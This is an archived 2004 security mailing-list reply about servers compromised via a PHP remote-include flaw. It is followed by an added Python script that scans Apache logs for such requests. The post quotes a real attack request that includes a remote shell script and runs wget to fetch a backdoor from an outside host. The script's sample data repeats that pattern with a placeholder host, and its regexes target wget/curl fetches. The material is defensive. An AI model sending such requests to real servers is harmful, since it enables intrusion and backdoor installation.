Security Incidents mailing list archives
Re: Systems compromised with ShellBOT perl script - part 2
From: "Chris Norton" <kicktd_list () hotmail com>
Date: Thu, 21 Oct 2004 11:53:08 -0500
This sounds like it may be a typical fopen()/include() PHP exploit, as this seems to be the motive for this group, as seen from the very first post:
Kirby Angell wrote:
> Yesterday we noticed a funny looking Apache log entry. It contained:
> http://www.DOMAIN.com/index.php?id=http://farpador.ubbi.com.br/cmd.txt?&cmd=http://farpador.ubbi.com.br/cmd.txt?&cmd=cd%20/tmp;wget%20http://members.lycos.co.uk/lotsen6k/.egg2

Here a remote PHP shell script file is used, and then the backdoor is uploaded onto the server. This can be avoided by setting safe_mode in php.ini to On and setting disabled_functions to include exec, popen, and passthru.

--
Chris Norton
UAT Student
Software Engineering
Network Defense
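The log entry quoted above, turned into a detection pass over Apache access-log lines, as an added example that is not part of the original post. The log lines and hostnames are constructed, and the two heuristics (a query value that is itself a URL, which is what a remote include()/fopen() fetches, and a value that carries a download command) are assumptions about what a reviewer would want flagged.

```python
# Added example, not code from the original post: flag access-log requests
# whose query-string values point at a remote URL or run a fetch command.
import re
from urllib.parse import unquote_plus

# Common/Combined Log Format: the request field is "METHOD TARGET PROTO".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
# A value that *is* a URL: what a remote include()/fopen() would load.
REMOTE_INCLUDE = re.compile(r'^(https?|ftp)://', re.IGNORECASE)
# A value that downloads a payload once the included script has run.
FETCH_CMD = re.compile(r'\b(wget|curl|fetch|lynx)\b.*\b(https?|ftp)://', re.IGNORECASE)

def query_params(target):
    """Split '/path?a=1&b=2' into decoded (name, value) pairs.
    Splits on '&' only, so a ';' inside a value (a shell separator in the
    quoted entry) stays part of that value regardless of Python version."""
    if '?' not in target:
        return []
    pairs = []
    for item in target.split('?', 1)[1].split('&'):
        if item:
            name, _, value = item.partition('=')
            pairs.append((unquote_plus(name), unquote_plus(value)))
    return pairs

def classify(value):
    """Label one decoded parameter value, or return None if it looks benign."""
    if REMOTE_INCLUDE.match(value):
        return 'remote-include'
    if FETCH_CMD.search(value):
        return 'fetch-command'
    return None

def scan_log(lines):
    """Return (ip, param, label, value) for every suspicious parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for name, value in query_params(m.group('target')):
            label = classify(value)
            if label:
                findings.append((m.group('ip'), name, label, value))
    return findings

# Constructed sample lines; 'payload-host.example' is a placeholder.
LOG_LINES = [
    '203.0.113.5 - - [20/Oct/2004:09:12:01 -0500] "GET /index.php?id=3 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [20/Oct/2004:09:12:07 -0500] "GET /index.php?id=http://payload-host.example/cmd.txt?&cmd=cd%20/tmp;wget%20http://payload-host.example/.egg2 HTTP/1.0" 200 311',
    '198.51.100.7 - - [20/Oct/2004:09:13:44 -0500] "GET /search.php?q=how+to+use+http%3A%2F%2F+in+links HTTP/1.1" 200 2048',
]

if __name__ == '__main__':
    for finding in scan_log(LOG_LINES):
        print(finding)
```

The third sample line shows why the URL check is anchored to the start of the value: a search term that merely mentions "http://" is not flagged.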